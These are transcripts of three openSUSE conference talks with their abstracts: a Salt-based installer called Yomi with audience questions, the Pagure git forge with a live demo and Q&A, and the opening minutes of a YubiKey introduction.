And the good thing is that this solution is always going to be the same. And it's very easy to understand why the algorithm is giving you this solution. And the final objective function is going to explain why those constraints are not possible to meet in some case. So if something goes wrong, you are going to see very easily why those constraints cannot meet and why it's better to resolve the hardware problem instead of continuing the installation. So this is basically what I want to say. And we can see here, this is the monitor tool that I was talking about. So you can see here a lot of states. We can see that those states are so far green and the output of salt is that it executes three, 16 states. Everything succeeds. Something interesting is that the state executing in both nodes are completely different because we make different decisions in both nodes. But we did that with a single command. So they take care of making decisions on, OK, this state makes sense in this node because this pillar and this grains. And we have two VMs here that are available with the user that I create for this matching. So we can see here that in that case we have one hard disk, three partitions. And if I find my place, we can see a different layout here. In that case, we have LBMs. And on top of LBM, we have swap root home and we have two partitions outside. One is a FEPartition and the other one is the part of LBM. So yes, that's my demo, my presentation, and if there are questions. So my first question is about the transactional updates because I know that Salt doesn't support yet the micro OS system, right? Yes, micro is supported. So fully supported. So it's working. Transaction data are there. So you are going to install micro. I mean, what I was doing these my last two weeks is do a full cubic orchestration. Full cubic orchestration. And one of the steps of a full cubic orchestration is installing micro. It's the first step. After that you need to reboot, execute, Google ADM and join the nodes and all the things that is for Kubernetes. This is properly installed with transactional update. In the same way that JAS is doing, that is the canonical way of doing micro installation. Yes. Also the post configuration of this node, that's also work with transactional updates. Yes. So yes, this is a good question. I mean, the post configuration is, there are several ways of understand post configuration. You have your node with a salt minion. This salt minion come from a live CD or Pixie boot, whatever way mechanism that you want to inject this salt minion and it's going to be executed in the memory of the node. It's okay. You have tons of state that are going to change the hard disk that is physically there and it's going to install all the software. But not everything ends there. This is a stage that is post installed. This post installed is going to take care of enable and disable service that the user decides, not the package. The user decides what state, because with system D and CX root, it's possible to enable and disable states. It's possible to configure the network. It's possible to go very far with CX root, of course. It's possible to go very far with an already installed system that you are not booting from there. So technically you can inject the database. If you have a database binary, you can inject that. You can synchronize a lot of information that is going to be ready for the first boot. Not always possible to do after the initial installation. 
For example, if you are using PostgreSQL, you are going to need, of course, the progress service there, so you need to reboot. But all the small details or all the elements that you can advance before the first key exit or reboot is part of this workflow. Yes. And do I need to specify something special on the state to specify that I'm going to install a package? Yes. Part of my job was to provide a root field inside the state. If you provide that and provide a valid CX root path, this state is going to be executed in the CX root environment. This is working for users, package. This is working for system D. And for any random state that you can apply, if you put that on top of another state that is CX root, so you can think about any random state that you want to be executed inside CX root, and you can do that. You can reverse that, and this is going to be executed there. Yes. Another question is about how does the master communicate with the target system if they don't have any operating system yet running? How are you communicating to install the system? Right. Maybe I was not clear, but you need to inject in the node a salt minion. In that case, in my example, you take a live ISO image and you boot from there. This image contains the salt minion and very small configuration and a small minion ID configuration and small auto sign mechanisms to set the certificate. In this example, it's not there, but in the example of micro s is there. In the installation image, you can inject again a new salt minion that is going to take over when you reboot. Because it's salt and you can do crazy stuff, you can take the certificate of the current salt minion that the salt master is now able to recognize and inject in the new image. The next time that the image reboot, the minion is going to be there. Master is going to acknowledge the minion and everything goes smooth. Then you say that you can control which packages are going to get started later. You can also configure with Jomi that you have a minimal system. This is the base pattern, for micro s, you install the three patterns that are expected to be there, whatever you want. What is the shape of that? I have a small emacs open here. This is the shape of a salt pillar. You can see that for this example, there is a section, there is software. In software, there is a repository entry and a package entry. In that case, it's very clear what is going to happen. This repo URL is going to be registered inside the CS route and only this pattern and this kernel is going to be installed, nothing else. You want something more, change the pillar and that's all. My last question is about you say that it's not multi-architecture support yet, only x86 there. Yes. I mean, I don't see any problem, but Grapp needs some tweaks depending on the architecture that you are in. The requirements are a bit different. The logic is in place. Room for this state, but it's not there yet. Thank you. Hello. I would like to ask if there is a forward verification. I mean, if I have a code of integration for example, there is a free to format to swap and there's nothing like this partition. Let's show me immediately when I start the process or in the process. Yes and no. I mean, this is the failed logic of salt. So the state, you're using a command to the state. In that case, it's create the swap partition. It's what's not possible to create, you have two options. Continue with the next state or fail there. 
Depending on how you configure the salt master, you have a hard fail and you can decide on stop here. If you don't have swap, there is no chance of doing anything else. Because I want to break frequently my state and I want to make sure that I can recover from my breakage. I want to continue. So in this example, salt master was taking the decision of continue with the state in production. It's expected that this is not going to happen. There is going to be a hard fail. And you can do that by state. So certain fails or certain states are okay, but not for others. So you can put this flag in the state that you think that continue can be helpful. Because maybe the broken edge is not so hard. You are going to have a boot system that you can adapt later. So you can take both decisions. Okay. And second, little bit tricky. What's the difference between unsolvable and salt? A lot. I mean, sorry about that. Yeah. I mean, with Ansible, you have this master. I mean, you don't have minions. So you have SSH. That means that if you have the certificate recognized in both sides, you have an open channel that you can send commands. In Ansible, there is not a concept of state. It is a set of logic steps that are going to guarantee that the final result is there or not. And there are some mechanisms, standard mechanisms, to validate that. So in states of guarantee, in Ansible, it's more like a list of execution models in salt. It's actions that are done there. And depending on the quality of the action, some of them are able to understand that something fails and is not even potent. I mean, sorry, an easy, indem-indem-ponent. I don't know how to say that properly in English. But in Ansible, it's not strange. It's frequent that when you apply a state several times, or sorry, an action several times, you are breaking more the code you know. So there's not kind of logic. So yeah. Yeah, maybe two additional comments. First of all, because normally the logic is running on the node itself, in this case in RAM, but it could also be in the running system. That's why it's so much faster, because there's almost no computation. So all the decisions, oh, you should do five partitions because the pillar says you should SDA one, two, three. All that is already rendered on a client. So you have a lot of compute power. If you have 100 machines installed, you have 100 times your number of CPUs that do all the computation. And the server is really just a dump file server that serves you all those config files and a message bus that says do this. And it's just this one command, salt, asterisk, apply high state that is sent over the bus in a broadcast and everyone is listening. Oh, it's an asterisk. So it's for everyone. Or oh, it's mentioning my exact host name or a certain grain I have. Like every four CPU server should do this or every server that has SUSE installed. And that makes it so much more efficient. It's also because you have a minion running and there's a concept of things like beacons, which are basically watch stocks you can configure. You can send events back to the server at any time. Ansible can only talk to the machine when it's talking to the machine. That's the main difference. And then of course, for that scenario, we are using kind of an older version of that approach for retail, for example, for our point of service. You can pixie boot a machine and ask it to say, oh, I'm now in a state where you can deploy me. This is the key I want you to accept. With Ansible, you would not be able to do that. 
You would have to build something else that actually checks, oh, the machine is there so I can SSH into the machine because the machine cannot talk to the server as long as there's no connection established. Salt does this. So salt, a minion comes up. It knows, oh, I have to talk to the master that's called mymaster.susa.org. And it will try to talk to that master and tell, oh, this is my key. Can you please accept that key? And then you can either have this pre-accepted in a wide list or you can go actually ask the guy who booted the machine, OK, can you please check on the screen whether that's the right key? You know, that's kind of the benefit. Well, I have two questions. What is more like from the user point of view? And the other is about implementation which probably is going to become kind of a two long discussions that will give the world for the first one, first of you, about being in them potent or where it is pronounced. And that's something we don't have in Autoyast. But sometimes I'm not pretty sure if you already have some machines. And for example, we sometimes specify in our Autoyast profiles that we want a new partition for data or whatever, but we really want it to be new. So we have flags about keeping partition that are found or recreate them and also about the file system. So but we see in them in the potent whatever approach, it may be that you decide to reuse something that is there. And that's not always what we wanted, even if it looks like our final partition, same size, same location, we may really want to reformat it just because we want. So I would like to see some example of how that can be achieved. Yeah, I mean, yeah, sorry, this is a very good question. I mean, there are a lot of level of explaining what is happening. The potent is a word, but let me try to address every level. A word we cannot pronounce. Yeah, funny pronunciation. So what you have a mechanism of doing the right thing in the right place. For exactly the use case that you are telling me, I implemented a flag. So there is a very easy way to see if the system was installed by Yomi and was in a successful state. The mark is applied at the end of the installation in the post installation stage and it's checked at the beginning because it's an estate, I checked that and you don't touch that. At the same level, if you want to force the installation of your device, you have another flag that is reformat takeover and this is going to take care of that. So it's a pillar that you say, you know, I don't want to take over. I want to already apply the jam, the installation step there and be sure that nothing is breakage. But the question is more deep because the concept of ownership of a resource and this is very deep and it's something that is a problem in Kiwi, it's a problem in Autogyas and it's a problem in Yomi. It's the ownership of the resource. For example, file system tab, who is the owner of file system tab? Sometimes it's a new package, sometimes it's an estate, sometimes it's an execution model, who is the owner of that? So if you add a new line that is going to register bar slash bar there and later there is a package that is checking that in the case of ETC, micro s is doing exactly that, who is the owner of the line? So ownership is something that affects the event. Because you don't want the event there. Because if a package later change this line, you don't want to reset that. So yeah, I need to leave. So this is something, a very deep question and I try to fix that use by use case. 
Okay so I guess the other one about linear programming is out so we can discuss it out there. Thank you. Thank you.
When we want to install openSUSE in out laptop we will use YaST. It will take care of all the details required for a correct partitioning, bootloader installation, time zone selection, network configuration, software selection, etc, etc. But when we want to install 100 nodes in our cloud, each one with a different hardware profile and a different role in our infrastructure, we need something different. AutoYaST can help with this, but there are some limitations, as we need to provide XMLs adjusted for those hardware profiles and roles, and we need a different tool to orchestrate those multiple installations. Can be done, but we can do better. SaltStack is a tool used to manage configuration and provisioning of machines, and we propose use this tool to drive the installation of openSUSE for big deployments. I want to show a WIP installer based on Salt, that can be naturally integrated in any other Salt-based solution, and I would like to talk about the ways that we can improve it in the future.
10.5446/54408 (DOI)
So, good afternoon, everyone. So I'm Pierre Chibon, also known as Pingu. Niel and I are going to introduce you a little bit about the Paguer project. So what's on the agenda? Basically we'll start with what Paguer is. We go back a little bit through the history of how it came to be. I'll present you a little bit further what the state is currently in and some of the features it has. I'll speak quickly about the ecosystems and some of the applications you can find around Paguer. Some of the ideas we have for the future. And then Niel will take over for attempting Murphy and see if we can actually get a live demo to work on stage here. So to the start, what Paguer is. So it's very hard word to pronounce for non-French people. You can ask Niel as a problem for it. Yeah, Paguer is a hard word to say. So it's the French word that refers to the Latin word Paguerus, which is a family of seashells, of which the most well known is the Paguerus Bernadus, which is also known as the Hermit crab. And some of the pictures you can see in there. It seems to be anecdotal from this, but I'm actually going to come back on this a little bit later because there is a little bit of a meaning behind this using this name. So for the purpose of this talk, Paguer is going to refer to a lightweight, gig-centric, Python-based, full project hosting forge, which also happens to be, you know, the GPLV2 or later versions. How does it come to be? Well, it started in the federal project and more precisely because of the release engineering team. So the release engineering team in federal used to work in a close proximity to each other, but also a little bit of a hard to reach team in federal. You could, it was hard to collaborate with them. It was hard to reach out, to figure out what they were working on, how they were working on them and see where you could poke at things to help them. So they were self-conscious of that and they wanted to improve that situation. So they wanted to open up the collaboration to get more of the people in the federal community to help with release engineering. At that time, we have Paguer, which was then called ProGit, as a proof of concept of the site, something which I worked on the site to see. The security was looking at the interaction between Python and Git. So why Paguer? Well, GitHub is the default nowadays platform for building open source software, for building software engine. The main issue is, if you look at the licensing, you're probably all aware of that, but GitHub is not a free and open source software. So for release engineering in federal, they were really attached to the notion of using only free and open source software to build federal. So GitHub was out of the picture. Then we have a number of competitors. We have fabricators. We have Garrett. But those are actually mainly about code review systems. They are, I spoke with one of the fabricator developers back then, and there was ideas about including an issue tracker in fabricator, but it was something down the line and not a priority for a project. It wasn't what the project was meant to for. And for GitLab, one of the requirements we had then was that everything in federal infrastructure had to be deployed from an RPM. And GitLab package has been a multiyear tentative, which has never succeeded. We've never been able to actually get GitLab package in federal, despite having several people working several years on this effort. And there's a second component to the GitLab. 
I don't know if many of you have been actually trying to maintain GitLab, but I will let Neil mention some words about that. So GitLab is great when you're using it as a user, and it has a lot of powerful functionality, but on the flip side, when you're administering that server, your life is kind of hell. The options tend to change quite a bit. The way that it actually handles its upgrades is rickety as best. It's always a new surprise what breaks in a GitLab upgrade. There was, for one of the places where I have maintained a GitLab server for going on a couple of years now, there was an entire release series, like three or four releases in a row, where merge requests did not work, because loading a merge request would cause it to spike up. The browser would be overloaded. There would be so much JavaScript, it would all fall over and you couldn't actually do anything. That sort of defeats the point of something that kind of emphasizes a merge request style or pull request style workflow. So it was not fun. So we've all just considered the reason-generating team in Fedora decided, let's give Pager a try and see how we can bring it forward. This has impacted also another team in Fedora, which is the infrastructure team itself. Back then, we were running something called Fedora hosted.org, and it was a place for projects where Fedora contributors were upstream. So just a place where you could use your code. Remember that Fedora basically started a little bit before GitLab, or at least before GitLab became what it is today. To the point that we actually were using track 0.12, I forgot to fix that version. So we were still using 0.12 even after the one.orelease was released and out. We were running different instance of track for each project. It was on self-service. So basically, if you wanted to create a new project in the Fedora ecosystem using the Fedora hosted.org domain, you would have to open a ticket to the infrastructure folks. One of them would wake up, see the ticket, process it, create the corresponding Git or SVN or Mercureo and Bazaar. I don't think we did. We have CVS back then. But we were offering all of these options and set up the track for you. So it could take between a few hours to a few days before you were actually able to publish your code. The other place where we stored code in Fedora is the Git repo. It's the place where we have a Git repository for every package we ship in Fedora. The thing is, for a while, there was no collaboration model on this Git. If you wanted to contribute to a patch to a spec file, the best way to do that was, you know, go to bugzilla, open a ticket and attach a spec file in there. And I'm sure we all love the review patches on bugzilla tickets. So this has come to what Pager is today. So to give you some dates, the first comment on the project is from March 2014. So a little bit more than five years ago. The Pager.io itself was released on May 2015, so a little bit more than a year after that. Fedora was sent in 2017. Source.fedoraproject.org was launched on February 2017. So this is our Git instance. Oh, sorry, on August 2017, that's our Git instance. And CentOS has recently also deployed Pager on the top of the Git last April. How does it look from a usage point of view? Well, Pager.io has about 1,600 projects today from about 700 users and 140 groups. 
Needless to say that the number of projects that we have on Pager.io is vastly greater than what we ever had on federalist.org, just the fact that you just can self-service as tremendously helped in there. So if you're wondering how Pager scales, on Fedora, we are running an instance that has about 30,000 projects. That's our Git. You know, almost 3,000 users. CentOS just started and they only have 7,000 projects so far. And on the scale ID, I'm aware of one Pager instance that is running with close to 45,000 projects. So it does scale to some extent. So what does it do? Well, it's a forge, you know, nothing new in there. We have a place where you can host your code, where you can place your documentation, where you can have an issue tracker, report bugs, report RFEs. And it provides the now de facto standout fork and pull request or launch request workflow. One of the, some of the features it has, it's designed to not be platform looking. So each project is actually composed of four Git repositories. One is the main one you interact with, the one that you're the most used to, which holds your code. The second one hosts your documentation. The documentation can be text files, HTML, markdown, REST. The markdown and the REST file will be converted to HTML on the fly. And then we have another two Git repos, one that contains all the ticket metadata and one that contains all the progress metadata. So if you want to move out of Git, of Pager, you can download these four Git repos and you have everything that is in the database for Pager for your project. It also comes back to the Pager instance, the Pager animal on the side there. Because one of the general idea was that you would be able to move a project from a Pager instance to another one. And that's actually also how we migrated our project from federalhasty.org to pager.io. We dumped the content from track, formatted it in the way that Pager expected it, enabled the hook on the ticket and the pull request tracker, get pushed, and everything appeared on the Pager side. So one of the original idea behind this was also that you would be able to have a private internal Pager instance and a public external Pager instance, and you would be able to sync issues from one to the other or pull request from one to the other. We also provide mirroring to Pager or mirroring from Pager. So if you look at Pager, we basically eat our own dog food. So Pager.io slash Pager is the original project. But Pager is also present on GitHub and on GitLab.org. We have a third-party plugin mechanisms, and we're starting to make use of this on the DissGit instance of Pager in Fedora so that we are able to prevent new endpoints that allows us to expand the use of Pager without putting in the upstream code endpoints logic that is specific to a DissGit deployment. So something we worked on recently. In Fedora, you have a point of contact, you have a main principle maintainer for every package, and sometimes that person goes away. And then the package is orphaned. For a while, people are able to un-offend the package, just make it their own. So we have a mechanism using this. We are able to say, well, if the package is orphaned and that person is a Pager, they are able to take the project from this orphan user. We have an extensible GitHub system. So if you want to write your own Git hooks, if you want to make it available on all the projects on your for or something that is optional, it's easy to do. We have teams. So we have four teams by default. 
I'm going to quickly go through three of them. This is the pagure.io one, very simple. We have a very similar one for the dist-git instance, this is it. This reminds me of the presentation we had yesterday about using a similar theme across applications. This is the git.centos.org one, and it is the closest to the default; they basically only changed the logo at the top here. And for the fourth theme, I'm leaving the surprise for a little bit later.

Some of the other things it does. How does it check SSH access, how does it check who can access which repos? Well, originally our dist-git instance was using Gitolite, so we built Pagure on top of Gitolite, and to some extent you could consider Pagure to be a sort of self-service admin interface for Gitolite. But we have since also gotten rid of it, because it has given us a lot of problems: when you have 30,000 repositories and you need to refresh the Gitolite configuration file and recompile it every time you add a new contributor to a project or add a new project, it can take a little bit of time. So Pagure itself now also has a way of being deployed without Gitolite. Something else which is also nice: you can reply to a comment, whether it's on a pull request or an issue, by email, and it will show up in the database and in the UI. We also have a number of notification systems: the classic webhooks that everybody uses now, but we also support a number of message buses. We have fedmsg, which started as the Fedora message bus and then became the federated message bus; it is ZeroMQ based, so very much a fire-and-forget system. We are moving from fedmsg to Fedora Messaging in the Fedora infrastructure, which is AMQP based, but we also support STOMP and MQTT notifications. To give you an idea: Fedora is using the top two, I know of one instance that is using STOMP, and the CentOS folks are using the MQTT one.

On the community side we have 146 contributors. That may not seem like much when you look at bigger projects, but from the infrastructure point of view this is definitely the project that has had the largest number of contributors. It used to be that 40% of the top ten contributors were not Red Hat employees, except that we hired one of them, so today it's only three out of the top ten contributors that are non-Red Hat. We have listed here the three public instances, which I've already mentioned, but we are aware of a few private instances as well: one of them (I'm not revealing a secret here) is run internally at Red Hat, others are run in different companies.

When it comes to the ecosystem, there is a little bit of one around Pagure. Building on the principle that the issue metadata is present in a Git repo that you can clone, there is a small utility called pag-off which basically lets you interact with your issue tracker offline. I use this all the time. When you're traveling, on a plane or on a train, you can just do something like "pag-off list pagure", and it will go to your local clone of your Pagure tickets and give you all the tickets that are open. You can assign them to yourself, close them, comment on them; you can do anything offline. And when you reach the network again, you just do a git pull and git push, and if you have enabled the right hook in the UI, your tickets are up to date. I find this very handy.
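As a rough illustration of the message-bus side mentioned above, this is how one might follow MQTT notifications from an instance that publishes them. The broker hostname, port and topic below are placeholders, not the real values used by Fedora or CentOS; check the instance's own documentation for those.

```bash
# Placeholder broker and topic; consult the instance's documentation for the real ones.
mosquitto_sub -h mqtt.example.org -p 8883 \
  --capath /etc/ssl/certs \
  -t 'pagure/#' -v
```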
We have a small Python library that interacts with the Pagure API. It was started by contributors in the Pagure project; it's not feature complete and does not cover the entire API, but it gives a base that people can collaborate on if they need or want to interact with Pagure from a project.

The third thing I'm going to speak about is called repoSpanner. It's fairly new; we are currently rolling it out in production. It's a distributed Git storage server. One of the issues of Pagure is that it needs direct access to the Git repos, which means that you can't really do load balancing unless you use something like NFS, and then you run into... it's doable, I know of an instance of Pagure that is running with the Git repos on NFS, but it can also be a pain to deal with once in a while. repoSpanner partly solves that: you basically create a cluster of repoSpanner nodes, and it mimics a little bit what GitHub uses in production. Every time you push something, it will sync your push to the nodes, and it needs the majority of the nodes to ack the change before it allows the push to go through. If the majority of the nodes is unavailable or not able to ack your push, it will deny the push and you will have to retry later. This also means that if you have a cluster of three and two have accepted the push, the third one is going to catch up later on. It's complex, but it's very powerful and quite a nice piece of software.

So that's what Pagure is today and what you can find around it. Now, ideas for the future. This slide used to be called a roadmap, but I fear the term roadmap implies "this is going to happen", while these are more foggy ideas of things we could do; I don't know if we will get to them. One of the ideas is to do a tighter integration with repoSpanner. Currently repoSpanner is entirely optional; moving to it would allow speeding up a number of operations in Pagure. Pagure relies on pygit2, which is a Python binding to the libgit2 library, and that has a number of issues. One of them, for example, is that cloning a Git repo leaks file descriptors, so if you have a lot of clones running at the same time, you end up with "too many open files" exceptions, to the point that I was receiving tens of emails about this problem, and I have actually replaced the libgit2/pygit2 repository clone with a simple subprocess call to git clone. I'm very unhappy about that, but it was actually a better fix than keeping things as they were. So moving to repoSpanner, and making it non-optional, would allow us to farm out some of the Git operations to repoSpanner, which is what it is meant to do. Improving the content of the webhooks and the notifications is something Neal has reported: apparently the payload we're sending in the webhook and message-bus notifications is not enough for everyone to act upon, so we need to identify what content is missing from these notifications and add it. And we would very much like to figure out a way of having a CI system integrate with Pagure and make it as easy as, you know, opting into Travis CI; it's probably going to be something like a checkbox in the settings and a YAML file in the sources, and it would automatically run the CI, trigger it on pull requests and on commits, and let you know how it went.
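The small Python library mentioned at the start of this section is a wrapper around Pagure's REST API, which you can also poke at directly. A quick sketch against the public pagure.io instance; the endpoint shape is taken from the public API as I understand it, so treat it as an assumption and adjust for your instance:

```bash
# List open issues of the upstream Pagure project itself via the REST API.
curl -s "https://pagure.io/api/0/pagure/issues?status=Open" | python3 -m json.tool | head -n 20
```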
One of the ideas I have in the back of my head is pull-request dependencies. If you work on different features at the same time, you're probably using a different branch for each feature, and potentially one feature depends on another, or you simply want to merge feature A, then B, then C, even if they are independent. If you keep opening them all against master, that's fine, except that your CI system is going to compare feature A against master, feature B against master, and feature C against master, and every time you merge one of them you need to rebase the other two to see what the CI now says with A merged, and then B and C. If instead you were able to say "I want to merge A first, then B, then C", we would be able to show you the pull request of C against B, B against A, and A against master, and your CI system would run A against master, B against A, and C against B; if you change the order, you just change the dependency order. It would also make reviewing easier, because with chained pull requests you would see only the diff of feature C against feature B, and not A, B and C against master. And when the CI has run and you have gone through the code and there is nothing to change, you can just merge A, B and C in one go, and you know your CI really tested A, B and C merged together. Another thing we would like is the ability to create a pull request from an email: basically sending a diff or a patch to a certain address that would open a pull request on that project. So again, these are not necessarily things that will be done, or done any time soon, but they are in the back of our minds and we would very much like to do them. And if anyone in the audience would like to work on any of these tasks, we would very much like to help you get it merged in.

And with this, I will hand over to Neal, and let's see if we can actually master Murphy this afternoon. This time we're going to do a thing where I move this over here. So this is a virtual machine running openSUSE Leap, and I have Pagure running on it. This is a Pagure instance running the surprise theme, which was actually contributed by Stasiek for Pagure a while ago when we did the 5.0 release. It's based on the theme that came from software.opensuse.org, the chameleon theme as it's officially called, and I pulled in a couple of projects here to kind of show off what it looks like. This one is the rpm-config-SUSE project, which I actually mirrored from GitHub earlier this morning and pulled in here, and you can see the changes that went in from these people. If I open this one here, you can see the diff, the commits, you can even see all the references; hyperlinks are clickable and will take you to the right place, the other branches from GitHub are there, and the original version of rpm-config-SUSE that I wrote is there. The other one I pulled in is something that looks somewhat like what we have in Fedora with dist-git: the salt packaging repo that's on the openSUSE GitHub org.
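As an aside, seeding a Pagure project from an existing GitHub repository, like in this demo, can be done with plain git, independent of Pagure's built-in mirroring feature. A rough sketch; both URLs are placeholders, and the destination project is assumed to already exist and be empty:

```bash
# Grab everything (all branches and tags) from the source repository...
git clone --mirror https://github.com/example-org/example-repo.git
cd example-repo.git
# ...and push it into the empty Pagure project (use the SSH URL your instance shows you).
git push --mirror ssh://git@pagure.example.org/example-repo.git
```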
And in here you can see the patches, and you can see that the diffs are actually highlighted correctly. If we go to a spec file here, the spec file syntax highlighting is totally correct, with the comments and descriptions and whatnot. And then you can see all the branches for all the different versions and all the crazy things that have been going on in here; no tags or releases so far.

So, a little bit in here. That's the wrong terminal; hold this. Thank you, that makes it easier. And I'm going to switch off the mirroring here, because otherwise this is very, very hard; you can't really push to a mirror. There we go. Now, from in here, let's go into salt, and let's use a bigger font. Not that one, this one. So in salt here we've got all of these files. I'm going to git mv all the things to the top-level directory, git rm -r the salt directory, because the salt directory doesn't exist in Git anymore once it's empty, that's how Git works. Then git commit -m "Move to top level", with an author at opensuse.org, and we'll do a -s just for the funsies. It says the name and email do not match... oh, because I forgot the funny quote thing at the end. There we go, and then it's going to make that commit. And that is... I am moving a shitload of files, that's probably not going to be fun no matter what with Git. Do it... or are you just going to sit there? Hold this for a second. Bloody demos. All right: git config --global user.email with my opensuse.org address, git config... I can't believe I'm doing this now, shame on me for not trying this part first. Now I can do it. There we go. And then git push. Actually, we're just going to do a fun thing and push this to a branch here. And that is pushed.

Now I can create a pull request right here, and you see here "open PR". Normally I could do this against a fork or whatever, but since I just did it within this repo, there's the thing: create the pull request. You can see I changed 21 files here, "Move to top level", and you can see I renamed all these things; there's no diff here, so it's got smart diff recognition for renames. Then delete branch after merging, and merge. Confirm merge. Yes, the worker should be running, otherwise very bad things would be happening right now. Oh, very bad things might be happening right now; let me check the journal. Hold on. Okay, the Pagure worker, and because of that, sudo. "Grabbing lock"... it is doing stuff, right? Task is running. Yep, there we go, it's starting to do stuff on the inside; you can see it's doing git things. Is it still trying to do this merge? No, it's done. There we go: "Move to top level" is the top commit. Did the branch go away? Nope, it's still trying to delete the branch. But there we go. And you see here at the top level all the files are there. The README did funny things in the syntax highlighting, but the spec is all here, and the pull request is done. Yep. So there we go, that's kind of the basics of what the Pagure interface looks like. It didn't go quite as perfectly as I hoped, but I think it went okay.
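For reference, the demo steps above boil down to something like the following reconstruction, with a placeholder identity; git mv combines the move and removal that were done separately in the demo:

```bash
# One-time identity setup that was missing in the demo:
git config --global user.name  "Your Name"
git config --global user.email "you@example.org"

# Inside the clone of the packaging repo:
git mv salt/* .                          # move everything to the top level
git commit -s -m "Move to top level"     # -s adds the Signed-off-by line
git push origin HEAD:move-to-top-level   # push a branch, then open the pull request in the web UI
```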
And now you get the very important question... I mean the very important slide, the very important slide that says thank you for your attention, and: do you have any questions? I see one in the back there. "Hi, thanks for the presentation. My question is: does Pagure support PGP-signed commits?" So the question is whether Pagure supports GPG-signed commits. As a Git repo, it supports GPG-signed commits; it does not currently show them in the UI, nor does it validate that the commits belong to the user. You could associate a user via the email address, I guess, but it does not show that in the UI; the backend supports it like any other Git repo. "Would this be a good feature request?" There is already a ticket on that.

Another question: "How do you store the binaries? You have a spec file and patches, but usually you also have tarballs and binary files. How do you store them?" So the question is how we store the binaries in the Fedora dist-git, I guess. "Is there a Git-integrated solution for that? I'm from the openSUSE world, so I have no clue how you do that." In Fedora we split the tarballs and the spec files into two different locations: the spec files live in the Git repos and the tarballs in the lookaside cache on the side. Our build system pulls the spec file, which comes with the sources file that includes the checksums of the tarballs, and using those checksums it retrieves the corresponding tarballs from the lookaside cache.

"If I want to do a code hosting scenario using Pagure, what are the key gaps or differences between Pagure and, let's say, GitLab?" What are the key differences between Pagure and GitLab? My take would be that it depends on the technology stack you're currently using. If your team is familiar and well versed in Ruby and knows how to maintain GitLab instances, then I would probably rely on GitLab. If your team is a Python shop or doesn't have much experience with running Ruby instances, Pagure is probably an interesting product to look into. The other thing is if you're running more constrained environments: one of the things that finally pushed me to look at Pagure more was that I could no longer run GitLab comfortably on my tiny cloud VPSes or on the little crappy ARM servers that I have at home. So for more constrained, or more flexible, environments Pagure is a lot easier to roll out and manage. It's also easier to plug into other infrastructure if you really want to, because of the way the architecture is set up, whereas GitLab is a very large monolithic Ruby on Rails thing with weird hybrid bits all over the place. So if you don't need all of the fanciness that GitLab has, if you want a somewhat smoother and easier experience maintaining your Git server, and you have some level of Python experience in case you want to extend things a little bit, Pagure is a lot nicer a choice than a lot of the other alternatives.

"So it's production ready then?" I mean, we're running it all over the place. I personally have two private Pagure instances, one that runs on Fedora and one that runs on openSUSE, mainly because the openSUSE one runs on Python 3. In the Fedora project we've got several of them: I think we have two production ones, two staging ones, and then CentOS has a production and a staging one, and we have a thingy that floats around doing stuff. I know of a few public independent instances that exist; you can kind of find them if you know how to Google for them. There are also a few people using it for their internal corporate Pagure instances, and they've actually contributed fixes and improvements to us as well. So the low barrier to entry for contributing and making the software better is, I think, a huge plus point for a lot of people.
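Coming back to the signed-commits question above, the plain Git side of it works against Pagure like against any other Git server; what is still missing, per the answer, is the UI part that would display or validate the signatures. A minimal sketch, assuming you already have a GPG key configured for Git:

```bash
git commit -S -m "Signed change"   # sign the commit with your default GPG key
git log --show-signature -1        # inspect the signature locally
git verify-commit HEAD             # explicit verification
```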
Just as a note on the resource constraints: I actually managed to get Pagure running on a Banana Pi. I'm not saying it was fast, and I'm not saying you want to host the Linux kernel tree on that Pagure instance, but it did work.

"Two more questions. First, when it comes to using it internally, has your Red Hat product team ever thought about integrating it into the OpenShift story, or are they on a completely different track with their technology stack? And second, on the CI: do you already have a direction, is there an existing CI project you would want to integrate, or are you going to build this from scratch? Are there any ideas about that?" So there are two questions here. From a product perspective, has Red Hat considered making Pagure a product? That I'm not actually able to answer; I don't think it has been considered as such. It is run internally, and I can also say the internal instance is running in OpenShift; that's how we know it does run in OpenShift. The second question is about the Pagure CI. We currently support Jenkins, and you can point Pagure at any Jenkins instance that Pagure can access. The Jenkins we mostly use is the one hosted by the ci.centos.org folks, just because the CentOS folks are our next-door neighbours and we can easily poke them and see how it goes. We would like to integrate with more CI systems; it's just that, so far, ci.centos.org has covered our needs, so there is less pressure to integrate with others. The architecture used is extensible, so we should be able to integrate with other CI systems; we just haven't managed to get it done yet.

At least with the Pagure CI stuff and Jenkins, the way it is set up is that when you configure a project and turn on the feature, you tell it which Jenkins instance you'd like to configure it with. So for example, if somebody had a project on pagure.io that was focused mainly on SUSE things, they could point it at ci.opensuse.org, and if they have the authentication set up to be able to do it, it can actually run CI jobs there, track the statuses, report back and do those kinds of things. We have been looking at a number of other CI systems to explore, to get Travis CI- or GitLab CI-like ease of use for managing CI; it's just difficult because the space is very confusing, to put it mildly. As far as plugging it in with stuff like OpenShift: one of the things I've been doing, because of the stuff that I run, is that I'd like to plug the build and release pipeline that's included in OpenShift into Pagure, and part of that is why we've been working on beefing up the notifications and the webhook stuff, so that it works a little bit better. There's already a project written by one of the Pagure contributors that bridges the gap in a slightly different way, but I'd like to have more direct support for integrating with more systems for these kinds of things, and that's where part of my focus has been recently.

"Does it have a Helm chart? Does it run on Kubernetes?" We don't have an official Helm chart for it. I know that one exists, because one of the externally run private instances of Pagure runs in Kubernetes, but nobody has stepped up to contribute a proper Helm chart to us. We would love to have one; it's just that nobody has given one to us. Thank you. I think that's the end of the questions.
So thank you all for your attention and have a good afternoon.
Pagure is a new, full-featured Git repository service for the web, written in Python. It is similar to other popular Git-based forges, allowing developers and contributors to share and collaborate on code and content. It also has some unique features not found in any other Git forge providing the basis for decentralized, federated software code hosting and development. It's fully free and open source software, and it's included in openSUSE Leap 15.1 and openSUSE Tumbleweed! The agenda of the presentation: - What is Pagure - History of Pagure - Current state and features of Pagure - Current ecosystem around Pagure - Plans for the future of Pagure - Demo of Pagure on openSUSE
10.5446/54409 (DOI)
So, my name is Karol, I'm working for SUSE, and I will talk about YubiKeys. This is only a very high-level introduction, so you won't hear any deep philosophical topics or anything like that. In case you don't even know what YubiKeys are, this is a picture of some of them. There are a few different models that you can buy, and mostly you use them via USB, but there are other options. You interact with them by pressing a button, and with certain applications magic will happen; this talk is about some of the magic they can do.

A few words about me: basically, like all of us here I assume, I'm an open source enthusiast. As I said, I work for SUSE as an engineer in the infrastructure team, so I'm in touch with these YubiKeys and I'm also using them every day. I somehow came to love cryptographic stuff, authentication, IT security and those kinds of topics, and together with other people I maintain the YubiKey packages in SUSE and openSUSE products, and also in Arch.

